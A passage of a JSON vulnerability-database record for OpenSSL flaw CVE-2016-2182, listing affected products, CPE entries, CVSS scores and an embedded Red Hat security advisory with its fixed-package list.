"trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" } ], "sources": [ { "db": "BID", "id": "92557" }, { "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "db": "NVD", "id": "CVE-2016-2182" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:certd:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_mcrp:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:dfw:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso_agent_option:10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_federation_agent:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:linux:5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2182" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "148524" } ], "trust": 0.4 }, "cve": "CVE-2016-2182", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": true, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-2182", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2016-2182", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2182", "trust": 1.8, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2016-2182", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2182" }, { "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "db": "NVD", "id": "CVE-2016-2182" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. ( Out-of-bounds writes and application crashes ) There are vulnerabilities that are subject to unspecified impact, such as being put into a state. Supplementary information : CWE Vulnerability type by CWE-787: Out-of-bounds Write ( Out-of-bounds writing ) Has been identified. http://cwe.mitre.org/data/definitions/787.htmlService disruption by a third party ( Out-of-bounds writes and application crashes ) There is a possibility of being affected unspecified, such as being in a state. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the affected application, resulting in denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 